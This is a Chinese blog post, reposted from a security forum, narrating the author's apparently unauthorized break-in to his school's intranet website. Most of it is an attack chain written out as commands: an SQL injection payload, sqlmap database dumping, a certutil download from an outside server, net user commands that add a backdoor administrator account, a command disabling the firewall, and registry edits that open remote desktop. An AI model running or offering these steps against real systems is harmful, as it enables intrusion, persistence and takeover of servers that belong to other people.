记一次不曲折的校内站点渗透 - 何止

admin 2021年12月31日15:20:20评论63 views字数 1424阅读4分44秒阅读模式

前言

备考的时候偶然点了进了本校内网的某个站点 , 停下了复习(直接拔剑)

测试到注入

http://url/newdetail.aspx?id=11999' or 1=1 --

直接Sqlmap一把过 , 连waf都没得(狗头)

随便看看

python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch --dbs
python  sqlmap.py -u "http://url/newdetail.aspx?id=119" --batch -users

DBMS

sqlserver 2005

whoami

在windows中nt authority system 是内置的系统管理账户

查看下目录chdir

Dir c:\

OS版本

Microsoft(R) Windows(R) Server 2003, Enterprise Edition

ipconfig

服务器端存在certutil等于是决定测试一下命令

vps

python -m SimpleHTTPServer 80

打一下

ping wt070h.dnslog.cn
certutil.exe -urlcache -split -f http://funny_ip/amazing1x

发现回显

奈何网站路径是中文的 , sqlmap写木马的话会乱码 , 找了找解决办法无果

看看环境变量

Nmap看看端口

因为尝试远程连接的时候出了一些问题,起初不知道是什么原因所以打算看看

尝试远程连接3389

新建用户

#新建用户
net user amazingadmin123 amazing.123456 /add
#赋予权限
net localgroup Administrators amazingadmin123 /add
#激活用户
net user amazingadmin123 /active:yes
#关闭防火墙
netsh firewall set opmode mode=disable
#开启默认设置 netsh firewall reset

通过注册表开启3389端口

echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
echo "ortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg

相关记录

相关记录

这个过程连续尝试了两三次都没有成功,也没找到原因,服务还关了,只能先考试等管理员开机了

考完试第三天网站上线了,再试试新建用户……

原来是安全策略的问题,不能使用简单地密码,新建用户的时候用了个复杂的密码就行了

远程连接✔️

配置加载中……

BY:先知论坛

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日15:20:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次不曲折的校内站点渗透 - 何止http://cn-sec.com/archives/711169.html

发表评论

匿名网友 填写信息